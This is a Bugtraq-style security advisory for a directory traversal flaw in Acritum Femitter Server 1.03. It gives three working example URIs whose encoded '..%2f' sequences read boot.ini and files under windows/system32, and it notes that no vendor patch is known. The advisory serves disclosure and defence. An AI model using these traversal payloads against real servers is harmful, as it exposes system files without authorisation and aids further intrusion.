Acritum Femitter Server URI Directory Traversal Vulnerability

Bugtraq ID:	39594
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Apr 20 2010 12:00AM
Updated:	Apr 20 2010 12:00AM
Credit:	Dr_IDE
Vulnerable:	Acritum Femitter Server 1.03
Not Vulnerable:

Acritum Femitter Server URI Directory Traversal Vulnerability

Acritum Femitter Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary local files and directories within the context of the webserver. Information harvested may aid in launching further attacks.

Acritum Femitter Server 1.03 is vulnerable; other versions may also be affected.

Acritum Femitter Server URI Directory Traversal Vulnerability

An attacker can exploit this issue with a web browser.

The following example URIs are available:

http://172.16.2.102////..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32/calc.exe

Acritum Femitter Server URI Directory Traversal Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

Acritum Femitter Server URI Directory Traversal Vulnerability

References:

• Acritum Femitter Server Product Page (Acritum)